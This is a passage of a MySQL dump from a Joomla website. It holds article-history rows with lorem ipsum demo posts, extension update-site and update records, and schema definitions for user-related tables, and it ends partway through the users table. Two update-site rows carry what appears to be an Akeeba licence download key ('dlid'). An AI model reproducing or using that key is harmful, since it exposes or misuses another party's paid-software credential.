\\"show_article_options\\\":\\\"\\\",\\\"show_urls_images_backend\\\":\\\"\\\",\\\"show_urls_images_frontend\\\":\\\"\\\",\\\"post_format\\\":\\\"standard\\\",\\\"gallery\\\":\\\"\\\",\\\"audio\\\":\\\"\\\",\\\"video\\\":\\\"\\\",\\\"link_title\\\":\\\"Responive Joomla Templates\\\",\\\"link_url\\\":\\\"http:\\\\\\/\\\\\\/www.joomshaper.com\\\\\\/joomla-templates\\\",\\\"quote_text\\\":\\\"\\\",\\\"quote_author\\\":\\\"\\\",\\\"post_status\\\":\\\"\\\"}\",\"version\":8,\"ordering\":\"3\",\"metakey\":\"\",\"metadesc\":\"\",\"access\":\"1\",\"hits\":\"39\",\"metadata\":\"{\\\"robots\\\":\\\"\\\",\\\"author\\\":\\\"\\\",\\\"rights\\\":\\\"\\\",\\\"xreference\\\":\\\"\\\"}\",\"featured\":\"0\",\"language\":\"*\",\"xreference\":\"\"}',0),(73,75,1,'','2016-02-28 11:16:08',692,4675,'342105ca08bd42406f626a91b28f141931df094a','{\"id\":75,\"asset_id\":\"199\",\"title\":\"5 Effective Email Unsubscribe Pages.\",\"alias\":\"5-effective-email-unsubscribe-pages\",\"introtext\":\"<p><img class=\\\"pull-left\\\" src=\\\"images\\/images-03.jpg\\\" alt=\\\"\\\" \\/> Pellentesque habitant morbi tristique senectus et netus et malesuada fames ac turpis egestas. Vestibulum tortor quam, feugiat vitae, ultricies eget, tempor sit amet, ante. Donec eu libero sit amet quam egestas semper. Aenean ultricies mi vitae est. Mauris placerat eleifend leo. Quisque sit amet est et sapien ullamcorper pharetra. Vestibulum erat wisi, condimentum sed, commodo vitae, ornare sit amet, wisi. Aenean fermentum, elit eget tincidunt condimentum, eros ipsum rutrum orci, sagittis tempus lacus enim ac dui. Donec non enim in turpis pulvinar facilisis. Ut felis. Praesent dapibus, neque id cursus faucibus, tortor neque egestas augue, eu vulputate magna eros eu erat. Aliquam erat volutpat. Nam dui mi, tincidunt quis, accumsan porttitor, facilisis luctus, metus<\\/p>\\r\\n<p>Pellentesque habitant morbi tristique senectus et netus et malesuada fames ac turpis egestas. Vestibulum tortor quam, feugiat vitae, ultricies eget, tempor sit amet, ante. Donec eu libero sit amet quam egestas semper. Aenean ultricies mi vitae est. Mauris placerat eleifend leo. Quisque sit amet est et sapien ullamcorper pharetra. Vestibulum erat wisi, condimentum sed, commodo vitae, ornare sit amet, wisi. Aenean fermentum, elit eget tincidunt condimentum, eros ipsum rutrum orci, sagittis tempus lacus enim ac dui. Donec non enim in turpis pulvinar facilisis. Ut felis. Praesent dapibus, neque id cursus faucibus, tortor neque egestas augue, eu vulputate magna eros eu erat. Aliquam erat volutpat. Nam dui mi, tincidunt quis, accumsan porttitor, facilisis luctus, metus<\\/p>\\r\\n<p>Pellentesque habitant morbi tristique senectus et netus et malesuada fames ac turpis egestas. Vestibulum tortor quam, feugiat vitae, ultricies eget, tempor sit amet, ante. Donec eu libero sit amet quam egestas semper. Aenean ultricies mi vitae est. Mauris placerat eleifend leo. Quisque sit amet est et sapien ullamcorper pharetra. Vestibulum erat wisi, condimentum sed, commodo vitae, ornare sit amet, wisi. Aenean fermentum, elit eget tincidunt condimentum, eros ipsum rutrum orci, sagittis tempus lacus enim ac dui. Donec non enim in turpis pulvinar facilisis. Ut felis. Praesent dapibus, neque id cursus faucibus, tortor neque egestas augue, eu vulputate magna eros eu erat. Aliquam erat volutpat. Nam dui mi, tincidunt quis, accumsan porttitor, facilisis luctus, metus<\\/p>\",\"fulltext\":\"\",\"state\":1,\"catid\":\"79\",\"created\":\"2015-02-02 20:29:50\",\"created_by\":\"692\",\"created_by_alias\":\"\",\"modified\":\"2016-02-28 11:16:08\",\"modified_by\":\"692\",\"checked_out\":\"692\",\"checked_out_time\":\"2016-02-28 11:15:53\",\"publish_up\":\"2015-02-02 20:29:50\",\"publish_down\":\"0000-00-00 00:00:00\",\"images\":\"{\\\"image_intro\\\":\\\"\\\",\\\"float_intro\\\":\\\"\\\",\\\"image_intro_alt\\\":\\\"\\\",\\\"image_intro_caption\\\":\\\"\\\",\\\"image_fulltext\\\":\\\"\\\",\\\"float_fulltext\\\":\\\"\\\",\\\"image_fulltext_alt\\\":\\\"\\\",\\\"image_fulltext_caption\\\":\\\"\\\"}\",\"urls\":\"{\\\"urla\\\":false,\\\"urlatext\\\":\\\"\\\",\\\"targeta\\\":\\\"\\\",\\\"urlb\\\":false,\\\"urlbtext\\\":\\\"\\\",\\\"targetb\\\":\\\"\\\",\\\"urlc\\\":false,\\\"urlctext\\\":\\\"\\\",\\\"targetc\\\":\\\"\\\"}\",\"attribs\":\"{\\\"show_title\\\":\\\"\\\",\\\"link_titles\\\":\\\"\\\",\\\"show_tags\\\":\\\"\\\",\\\"show_intro\\\":\\\"\\\",\\\"info_block_position\\\":\\\"\\\",\\\"show_category\\\":\\\"\\\",\\\"link_category\\\":\\\"\\\",\\\"show_parent_category\\\":\\\"\\\",\\\"link_parent_category\\\":\\\"\\\",\\\"show_author\\\":\\\"\\\",\\\"link_author\\\":\\\"\\\",\\\"show_create_date\\\":\\\"\\\",\\\"show_modify_date\\\":\\\"\\\",\\\"show_publish_date\\\":\\\"\\\",\\\"show_item_navigation\\\":\\\"\\\",\\\"show_icons\\\":\\\"\\\",\\\"show_print_icon\\\":\\\"\\\",\\\"show_email_icon\\\":\\\"\\\",\\\"show_vote\\\":\\\"\\\",\\\"show_hits\\\":\\\"\\\",\\\"show_noauth\\\":\\\"\\\",\\\"urls_position\\\":\\\"\\\",\\\"alternative_readmore\\\":\\\"\\\",\\\"article_layout\\\":\\\"\\\",\\\"show_publishing_options\\\":\\\"\\\",\\\"show_article_options\\\":\\\"\\\",\\\"show_urls_images_backend\\\":\\\"\\\",\\\"show_urls_images_frontend\\\":\\\"\\\",\\\"post_format\\\":\\\"standard\\\",\\\"gallery\\\":\\\"\\\",\\\"audio\\\":\\\"<iframe width=\\\\\\\"100%\\\\\\\" height=\\\\\\\"450\\\\\\\" scrolling=\\\\\\\"no\\\\\\\" frameborder=\\\\\\\"no\\\\\\\" src=\\\\\\\"https:\\\\\\/\\\\\\/w.soundcloud.com\\\\\\/player\\\\\\/?url=https%3A\\\\\\/\\\\\\/api.soundcloud.com\\\\\\/tracks\\\\\\/28830162&auto_play=false&hide_related=false&show_comments=true&show_user=true&show_reposts=false&visual=true\\\\\\\"><\\\\\\/iframe>\\\",\\\"video\\\":\\\"\\\",\\\"link_title\\\":\\\"\\\",\\\"link_url\\\":\\\"\\\",\\\"quote_text\\\":\\\"\\\",\\\"quote_author\\\":\\\"\\\",\\\"post_status\\\":\\\"\\\"}\",\"version\":10,\"ordering\":\"4\",\"metakey\":\"\",\"metadesc\":\"\",\"access\":\"1\",\"hits\":\"24\",\"metadata\":\"{\\\"robots\\\":\\\"\\\",\\\"author\\\":\\\"\\\",\\\"rights\\\":\\\"\\\",\\\"xreference\\\":\\\"\\\"}\",\"featured\":\"0\",\"language\":\"*\",\"xreference\":\"\"}',0),(74,74,1,'','2016-02-28 11:16:12',692,3704,'e65972461571422435e3f5108aea882b273a5c05','{\"id\":74,\"asset_id\":\"198\",\"title\":\"The salesman is dead. Long live the salesman.\",\"alias\":\"the-salesman-is-dead-long-live-the-salesman\",\"introtext\":\"<p><img class=\\\"pull-left\\\" src=\\\"images\\/images-02.jpg\\\" alt=\\\"\\\" \\/>\\u00a0Pellentesque habitant morbi tristique senectus et netus et malesuada fames ac turpis egestas. Vestibulum tortor quam, feugiat vitae, ultricies eget, tempor sit amet, ante. Donec eu libero sit amet quam egestas semper. Aenean ultricies mi vitae est. Mauris placerat eleifend leo. Quisque sit amet est et sapien ullamcorper pharetra. Vestibulum erat wisi, condimentum sed, commodo vitae, ornare sit amet, wisi. Aenean fermentum, elit eget tincidunt condimentum, eros ipsum rutrum orci, sagittis tempus lacus enim ac dui. Donec non enim in turpis pulvinar facilisis. Ut felis. Praesent dapibus, neque id cursus faucibus, tortor neque egestas augue, eu vulputate magna eros eu erat. Aliquam erat volutpat. Nam dui mi, tincidunt quis, accumsan porttitor, facilisis luctus, metus<\\/p>\\r\\n<p>Pellentesque habitant morbi tristique senectus et netus et malesuada fames ac turpis egestas. Vestibulum tortor quam, feugiat vitae, ultricies eget, tempor sit amet, ante. Donec eu libero sit amet quam egestas semper. Aenean ultricies mi vitae est. Mauris placerat eleifend leo. Quisque sit amet est et sapien ullamcorper pharetra. Vestibulum erat wisi, condimentum sed, commodo vitae, ornare sit amet, wisi. Aenean fermentum, elit eget tincidunt condimentum, eros ipsum rutrum orci, sagittis tempus lacus enim ac dui. Donec non enim in turpis pulvinar facilisis. Ut felis. Praesent dapibus, neque id cursus faucibus, tortor neque egestas augue, eu vulputate magna eros eu erat. Aliquam erat volutpat. Nam dui mi, tincidunt quis, accumsan porttitor, facilisis luctus, metus<\\/p>\",\"fulltext\":\"\",\"state\":1,\"catid\":\"79\",\"created\":\"2015-02-02 20:29:50\",\"created_by\":\"692\",\"created_by_alias\":\"\",\"modified\":\"2016-02-28 11:16:12\",\"modified_by\":\"692\",\"checked_out\":\"692\",\"checked_out_time\":\"2016-02-28 11:15:54\",\"publish_up\":\"2015-02-02 20:29:50\",\"publish_down\":\"0000-00-00 00:00:00\",\"images\":\"{\\\"image_intro\\\":\\\"\\\",\\\"float_intro\\\":\\\"\\\",\\\"image_intro_alt\\\":\\\"\\\",\\\"image_intro_caption\\\":\\\"\\\",\\\"image_fulltext\\\":\\\"\\\",\\\"float_fulltext\\\":\\\"\\\",\\\"image_fulltext_alt\\\":\\\"\\\",\\\"image_fulltext_caption\\\":\\\"\\\"}\",\"urls\":\"{\\\"urla\\\":false,\\\"urlatext\\\":\\\"\\\",\\\"targeta\\\":\\\"\\\",\\\"urlb\\\":false,\\\"urlbtext\\\":\\\"\\\",\\\"targetb\\\":\\\"\\\",\\\"urlc\\\":false,\\\"urlctext\\\":\\\"\\\",\\\"targetc\\\":\\\"\\\"}\",\"attribs\":\"{\\\"show_title\\\":\\\"\\\",\\\"link_titles\\\":\\\"\\\",\\\"show_tags\\\":\\\"\\\",\\\"show_intro\\\":\\\"\\\",\\\"info_block_position\\\":\\\"\\\",\\\"show_category\\\":\\\"\\\",\\\"link_category\\\":\\\"\\\",\\\"show_parent_category\\\":\\\"\\\",\\\"link_parent_category\\\":\\\"\\\",\\\"show_author\\\":\\\"\\\",\\\"link_author\\\":\\\"\\\",\\\"show_create_date\\\":\\\"\\\",\\\"show_modify_date\\\":\\\"\\\",\\\"show_publish_date\\\":\\\"\\\",\\\"show_item_navigation\\\":\\\"\\\",\\\"show_icons\\\":\\\"\\\",\\\"show_print_icon\\\":\\\"\\\",\\\"show_email_icon\\\":\\\"\\\",\\\"show_vote\\\":\\\"\\\",\\\"show_hits\\\":\\\"\\\",\\\"show_noauth\\\":\\\"\\\",\\\"urls_position\\\":\\\"\\\",\\\"alternative_readmore\\\":\\\"\\\",\\\"article_layout\\\":\\\"\\\",\\\"show_publishing_options\\\":\\\"\\\",\\\"show_article_options\\\":\\\"\\\",\\\"show_urls_images_backend\\\":\\\"\\\",\\\"show_urls_images_frontend\\\":\\\"\\\",\\\"post_format\\\":\\\"standard\\\",\\\"gallery\\\":\\\"{\\\\\\\"gallery_images\\\\\\\":[\\\\\\\"images\\\\\\/blog\\\\\\/blog06.jpg\\\\\\\",\\\\\\\"images\\\\\\/blog\\\\\\/blog05.jpg\\\\\\\",\\\\\\\"images\\\\\\/blog\\\\\\/blog04.jpg\\\\\\\"]}\\\",\\\"audio\\\":\\\"\\\",\\\"video\\\":\\\"\\\",\\\"link_title\\\":\\\"\\\",\\\"link_url\\\":\\\"\\\",\\\"quote_text\\\":\\\"\\\",\\\"quote_author\\\":\\\"\\\",\\\"post_status\\\":\\\"\\\"}\",\"version\":8,\"ordering\":\"5\",\"metakey\":\"\",\"metadesc\":\"\",\"access\":\"1\",\"hits\":\"38\",\"metadata\":\"{\\\"robots\\\":\\\"\\\",\\\"author\\\":\\\"\\\",\\\"rights\\\":\\\"\\\",\\\"xreference\\\":\\\"\\\"}\",\"featured\":\"0\",\"language\":\"*\",\"xreference\":\"\"}',0),(75,73,1,'','2016-02-28 11:16:17',692,3064,'20d0c27c16b5c52f6cc6705adb70b9beede17e3d','{\"id\":73,\"asset_id\":\"197\",\"title\":\"Portable sales devices making a difference.\",\"alias\":\"portable-sales-devices-making-a-difference\",\"introtext\":\"<p><img class=\\\"pull-left\\\" src=\\\"images\\/images-06.jpg\\\" alt=\\\"\\\" \\/> Pellentesque habitant morbi tristique senectus et netus et malesuada fames ac turpis egestas. Vestibulum tortor quam, feugiat vitae, ultricies eget, tempor sit amet, ante. Donec eu libero sit amet quam egestas semper. Aenean ultricies mi vitae est. Mauris placerat eleifend leo.<\\/p>\\r\\n<p>Pellentesque habitant morbi tristique senectus et netus et malesuada fames ac turpis egestas. Vestibulum tortor quam, feugiat vitae, ultricies eget, tempor sit amet, ante. Donec eu libero sit amet quam egestas semper. Aenean ultricies mi vitae est. Mauris placerat eleifend leo. Quisque sit amet est et sapien ullamcorper pharetra. Vestibulum erat wisi, condimentum sed, commodo vitae, ornare sit amet, wisi. Aenean fermentum, elit eget tincidunt condimentum, eros ipsum rutrum orci, sagittis tempus lacus enim ac dui. Donec non enim in turpis pulvinar facilisis. Ut felis. Praesent dapibus, neque id cursus faucibus, tortor neque egestas augue, eu vulputate magna eros eu erat. Aliquam erat volutpat. Nam dui mi, tincidunt quis, accumsan porttitor, facilisis luctus, metus<\\/p>\",\"fulltext\":\"\",\"state\":1,\"catid\":\"79\",\"created\":\"2015-02-02 20:29:50\",\"created_by\":\"692\",\"created_by_alias\":\"\",\"modified\":\"2016-02-28 11:16:17\",\"modified_by\":\"692\",\"checked_out\":\"692\",\"checked_out_time\":\"2016-02-28 11:15:56\",\"publish_up\":\"2015-02-02 20:29:50\",\"publish_down\":\"0000-00-00 00:00:00\",\"images\":\"{\\\"image_intro\\\":\\\"\\\",\\\"float_intro\\\":\\\"\\\",\\\"image_intro_alt\\\":\\\"\\\",\\\"image_intro_caption\\\":\\\"\\\",\\\"image_fulltext\\\":\\\"\\\",\\\"float_fulltext\\\":\\\"\\\",\\\"image_fulltext_alt\\\":\\\"\\\",\\\"image_fulltext_caption\\\":\\\"\\\"}\",\"urls\":\"{\\\"urla\\\":false,\\\"urlatext\\\":\\\"\\\",\\\"targeta\\\":\\\"\\\",\\\"urlb\\\":false,\\\"urlbtext\\\":\\\"\\\",\\\"targetb\\\":\\\"\\\",\\\"urlc\\\":false,\\\"urlctext\\\":\\\"\\\",\\\"targetc\\\":\\\"\\\"}\",\"attribs\":\"{\\\"show_title\\\":\\\"\\\",\\\"link_titles\\\":\\\"\\\",\\\"show_tags\\\":\\\"\\\",\\\"show_intro\\\":\\\"\\\",\\\"info_block_position\\\":\\\"\\\",\\\"show_category\\\":\\\"\\\",\\\"link_category\\\":\\\"\\\",\\\"show_parent_category\\\":\\\"\\\",\\\"link_parent_category\\\":\\\"\\\",\\\"show_author\\\":\\\"\\\",\\\"link_author\\\":\\\"\\\",\\\"show_create_date\\\":\\\"\\\",\\\"show_modify_date\\\":\\\"\\\",\\\"show_publish_date\\\":\\\"\\\",\\\"show_item_navigation\\\":\\\"\\\",\\\"show_icons\\\":\\\"\\\",\\\"show_print_icon\\\":\\\"\\\",\\\"show_email_icon\\\":\\\"\\\",\\\"show_vote\\\":\\\"\\\",\\\"show_hits\\\":\\\"\\\",\\\"show_noauth\\\":\\\"\\\",\\\"urls_position\\\":\\\"\\\",\\\"alternative_readmore\\\":\\\"\\\",\\\"article_layout\\\":\\\"\\\",\\\"show_publishing_options\\\":\\\"\\\",\\\"show_article_options\\\":\\\"\\\",\\\"show_urls_images_backend\\\":\\\"\\\",\\\"show_urls_images_frontend\\\":\\\"\\\",\\\"post_format\\\":\\\"standard\\\",\\\"gallery\\\":\\\"\\\",\\\"audio\\\":\\\"\\\",\\\"video\\\":\\\"\\\",\\\"link_title\\\":\\\"\\\",\\\"link_url\\\":\\\"\\\",\\\"quote_text\\\":\\\"\\\",\\\"quote_author\\\":\\\"\\\",\\\"post_status\\\":\\\"\\\"}\",\"version\":9,\"ordering\":\"6\",\"metakey\":\"\",\"metadesc\":\"\",\"access\":\"1\",\"hits\":\"97\",\"metadata\":\"{\\\"robots\\\":\\\"\\\",\\\"author\\\":\\\"\\\",\\\"rights\\\":\\\"\\\",\\\"xreference\\\":\\\"\\\"}\",\"featured\":\"0\",\"language\":\"*\",\"xreference\":\"\"}',0);
/*!40000 ALTER TABLE `atlyh_ucm_history` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `atlyh_update_sites`
--
DROP TABLE IF EXISTS `atlyh_update_sites`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `atlyh_update_sites` (
`update_site_id` int(11) NOT NULL AUTO_INCREMENT,
`name` varchar(100) DEFAULT '',
`type` varchar(20) DEFAULT '',
`location` text NOT NULL,
`enabled` int(11) DEFAULT 0,
`last_check_timestamp` bigint(20) DEFAULT 0,
`extra_query` varchar(1000) DEFAULT '',
PRIMARY KEY (`update_site_id`)
) ENGINE=InnoDB AUTO_INCREMENT=20 DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci COMMENT='Update Sites';
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `atlyh_update_sites`
--
LOCK TABLES `atlyh_update_sites` WRITE;
/*!40000 ALTER TABLE `atlyh_update_sites` DISABLE KEYS */;
INSERT INTO `atlyh_update_sites` VALUES (1,'Joomla! Core','collection','http://update.joomla.org/core/list.xml',1,1457441589,''),(2,'Joomla! Extension Directory','collection','http://update.joomla.org/jed/list.xml',1,1457441587,''),(3,'Accredited Joomla! Translations','collection','http://update.joomla.org/language/translationlist_3.xml',0,0,''),(4,'Joomla! Update Component Update Site','extension','http://update.joomla.org/core/extensions/com_joomlaupdate.xml',1,1457441587,''),(5,'System - Helix3 Framework','extension','http://www.joomshaper.com/updates/plg_system_helix3.xml',1,1457441587,''),(7,'System - Helix3 Framework','extension','http://www.joomshaper.com/updates/plg_ajax_helix3.xml',1,1457441587,''),(8,'shaper_helix3','template','http://www.joomshaper.com/updates/tpl_helix3.xml',1,0,''),(10,'Admin Tools Professional','extension','http://cdn.akeebabackup.com/updates/atpro.xml',1,1457441587,'dlid=e71ed15695d9335d00057d6681477e90'),(11,'Akeeba Backup Professional','extension','http://cdn.akeebabackup.com/updates/abpro.xml',1,1457441587,'dlid=e71ed15695d9335d00057d6681477e90'),(12,'Watchfully Slave Update','extension','https://watchful.li/index.php?option=com_ars&view=update&task=stream&format=xml&id=1&dummy=extension.xml',1,1457441587,''),(13,'Image Recycle Updates','extension','https://www.imagerecycle.com/joomla_extension.xml',1,1457441587,''),(15,'News Show Pro GK5 Updates','extension','https://www.gavick.com/update_server/joomla30/nsp_gk5.xml',1,1457441587,''),(16,'DJ-ImageSlider Package','extension','http://dj-extensions.com/updates/djimageslider.xml',1,1457441587,''),(18,'SP Page Builder','extension','http://www.joomshaper.com/updates/com-sp-page-builder-free.xml',1,1457441587,''),(19,'SP Page Builder','extension','http://www.joomshaper.com/updates/com-sp-page-builder-pro.xml',1,1457441587,'');
/*!40000 ALTER TABLE `atlyh_update_sites` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `atlyh_update_sites_extensions`
--
DROP TABLE IF EXISTS `atlyh_update_sites_extensions`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `atlyh_update_sites_extensions` (
`update_site_id` int(11) NOT NULL DEFAULT 0,
`extension_id` int(11) NOT NULL DEFAULT 0,
PRIMARY KEY (`update_site_id`,`extension_id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci COMMENT='Links extensions to update sites';
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `atlyh_update_sites_extensions`
--
LOCK TABLES `atlyh_update_sites_extensions` WRITE;
/*!40000 ALTER TABLE `atlyh_update_sites_extensions` DISABLE KEYS */;
INSERT INTO `atlyh_update_sites_extensions` VALUES (1,700),(2,700),(3,600),(4,28),(5,10002),(7,10001),(8,10003),(10,10016),(11,10023),(12,10027),(13,10028),(15,10038),(16,10041),(18,10047),(19,10047);
/*!40000 ALTER TABLE `atlyh_update_sites_extensions` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `atlyh_updates`
--
DROP TABLE IF EXISTS `atlyh_updates`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `atlyh_updates` (
`update_id` int(11) NOT NULL AUTO_INCREMENT,
`update_site_id` int(11) DEFAULT 0,
`extension_id` int(11) DEFAULT 0,
`name` varchar(100) DEFAULT '',
`description` text NOT NULL,
`element` varchar(100) DEFAULT '',
`type` varchar(20) DEFAULT '',
`folder` varchar(20) DEFAULT '',
`client_id` tinyint(3) DEFAULT 0,
`version` varchar(32) DEFAULT '',
`data` text NOT NULL,
`detailsurl` text NOT NULL,
`infourl` text NOT NULL,
`extra_query` varchar(1000) DEFAULT '',
PRIMARY KEY (`update_id`)
) ENGINE=InnoDB AUTO_INCREMENT=5 DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci COMMENT='Available Updates';
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `atlyh_updates`
--
LOCK TABLES `atlyh_updates` WRITE;
/*!40000 ALTER TABLE `atlyh_updates` DISABLE KEYS */;
INSERT INTO `atlyh_updates` VALUES (1,5,0,'System - Helix3 Framework','','helix3','plugin','system',1,'1.1','','http://www.joomshaper.com/updates/plg_system_helix3.xml','',''),(2,7,0,'Helix3 - Ajax','','helix3','plugin','ajax',1,'1.1','','http://www.joomshaper.com/updates/plg_ajax_helix3.xml','',''),(3,15,10038,'News Show Pro GK5','News Show Pro GK5','mod_news_pro_gk5','module','',0,'1.9.3.1','','https://www.gavick.com/update_server/joomla30/nsp_gk5.xml','http://www.gavick.com/news-show-pro-gk5.html',''),(4,18,10047,'SP Page Builder','','com_sppagebuilder','component','',1,'1.0.8','','http://www.joomshaper.com/updates/com-sp-page-builder-free.xml','','');
/*!40000 ALTER TABLE `atlyh_updates` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `atlyh_user_keys`
--
DROP TABLE IF EXISTS `atlyh_user_keys`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `atlyh_user_keys` (
`id` int(10) unsigned NOT NULL AUTO_INCREMENT,
`user_id` varchar(255) NOT NULL,
`token` varchar(255) NOT NULL,
`series` varchar(255) NOT NULL,
`invalid` tinyint(4) NOT NULL,
`time` varchar(200) NOT NULL,
`uastring` varchar(255) NOT NULL,
PRIMARY KEY (`id`),
UNIQUE KEY `series` (`series`),
UNIQUE KEY `series_2` (`series`),
UNIQUE KEY `series_3` (`series`),
KEY `user_id` (`user_id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `atlyh_user_keys`
--
LOCK TABLES `atlyh_user_keys` WRITE;
/*!40000 ALTER TABLE `atlyh_user_keys` DISABLE KEYS */;
/*!40000 ALTER TABLE `atlyh_user_keys` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `atlyh_user_notes`
--
DROP TABLE IF EXISTS `atlyh_user_notes`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `atlyh_user_notes` (
`id` int(10) unsigned NOT NULL AUTO_INCREMENT,
`user_id` int(10) unsigned NOT NULL DEFAULT 0,
`catid` int(10) unsigned NOT NULL DEFAULT 0,
`subject` varchar(100) NOT NULL DEFAULT '',
`body` text NOT NULL,
`state` tinyint(3) NOT NULL DEFAULT 0,
`checked_out` int(10) unsigned NOT NULL DEFAULT 0,
`checked_out_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
`created_user_id` int(10) unsigned NOT NULL DEFAULT 0,
`created_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
`modified_user_id` int(10) unsigned NOT NULL,
`modified_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
`review_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
`publish_up` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
`publish_down` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
PRIMARY KEY (`id`),
KEY `idx_user_id` (`user_id`),
KEY `idx_category_id` (`catid`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `atlyh_user_notes`
--
LOCK TABLES `atlyh_user_notes` WRITE;
/*!40000 ALTER TABLE `atlyh_user_notes` DISABLE KEYS */;
/*!40000 ALTER TABLE `atlyh_user_notes` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `atlyh_user_profiles`
--
DROP TABLE IF EXISTS `atlyh_user_profiles`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `atlyh_user_profiles` (
`user_id` int(11) NOT NULL,
`profile_key` varchar(100) NOT NULL,
`profile_value` text NOT NULL,
`ordering` int(11) NOT NULL DEFAULT 0,
UNIQUE KEY `idx_user_id_profile_key` (`user_id`,`profile_key`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci COMMENT='Simple user profile storage table';
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `atlyh_user_profiles`
--
LOCK TABLES `atlyh_user_profiles` WRITE;
/*!40000 ALTER TABLE `atlyh_user_profiles` DISABLE KEYS */;
/*!40000 ALTER TABLE `atlyh_user_profiles` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `atlyh_user_usergroup_map`
--
DROP TABLE IF EXISTS `atlyh_user_usergroup_map`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `atlyh_user_usergroup_map` (
`user_id` int(10) unsigned NOT NULL DEFAULT 0 COMMENT 'Foreign Key to #__users.id',
`group_id` int(10) unsigned NOT NULL DEFAULT 0 COMMENT 'Foreign Key to #__usergroups.id',
PRIMARY KEY (`user_id`,`group_id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `atlyh_user_usergroup_map`
--
LOCK TABLES `atlyh_user_usergroup_map` WRITE;
/*!40000 ALTER TABLE `atlyh_user_usergroup_map` DISABLE KEYS */;
INSERT INTO `atlyh_user_usergroup_map` VALUES (692,8);
/*!40000 ALTER TABLE `atlyh_user_usergroup_map` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `atlyh_usergroups`
--
DROP TABLE IF EXISTS `atlyh_usergroups`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `atlyh_usergroups` (
`id` int(10) unsigned NOT NULL AUTO_INCREMENT COMMENT 'Primary Key',
`parent_id` int(10) unsigned NOT NULL DEFAULT 0 COMMENT 'Adjacency List Reference Id',
`lft` int(11) NOT NULL DEFAULT 0 COMMENT 'Nested set lft.',
`rgt` int(11) NOT NULL DEFAULT 0 COMMENT 'Nested set rgt.',
`title` varchar(100) NOT NULL DEFAULT '',
PRIMARY KEY (`id`),
UNIQUE KEY `idx_usergroup_parent_title_lookup` (`parent_id`,`title`),
KEY `idx_usergroup_title_lookup` (`title`),
KEY `idx_usergroup_adjacency_lookup` (`parent_id`),
KEY `idx_usergroup_nested_set_lookup` (`lft`,`rgt`)
) ENGINE=InnoDB AUTO_INCREMENT=10 DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `atlyh_usergroups`
--
LOCK TABLES `atlyh_usergroups` WRITE;
/*!40000 ALTER TABLE `atlyh_usergroups` DISABLE KEYS */;
INSERT INTO `atlyh_usergroups` VALUES (1,0,1,18,'Public'),(2,1,8,15,'Registered'),(3,2,9,14,'Author'),(4,3,10,13,'Editor'),(5,4,11,12,'Publisher'),(6,1,4,7,'Manager'),(7,6,5,6,'Administrator'),(8,1,16,17,'Super Users'),(9,1,2,3,'Guest');
/*!40000 ALTER TABLE `atlyh_usergroups` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `atlyh_users`
--
DROP TABLE IF EXISTS `atlyh_users`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `atlyh_users` (
`id` int(11) NOT NULL AUTO_INCREMENT,
`name` varchar(255) NOT NULL DEFAULT '',
`username` varchar(150) NOT NULL DEFAULT '',
`email` varchar(100) NOT NULL DEFAULT '',
`password` varchar(100) NOT NULL DEFAULT '',
`block` tinyint(4) NOT NULL DEFAULT 0,
`sendEmail` tinyint(4) DEFAULT 0,
`registerDate` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
`lastvisitDate` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
`activation` varchar(100) NOT NULL DEFAULT '',
`params` text NOT NULL,
`lastResetTime` datetime NOT NULL DEFAULT '0000-00-00 00:00:00' COMMENT 'Date of last password reset',
`resetCount` int(11) NOT NULL DEFAULT 0 COMMENT 'Count of password resets since lastResetTime',
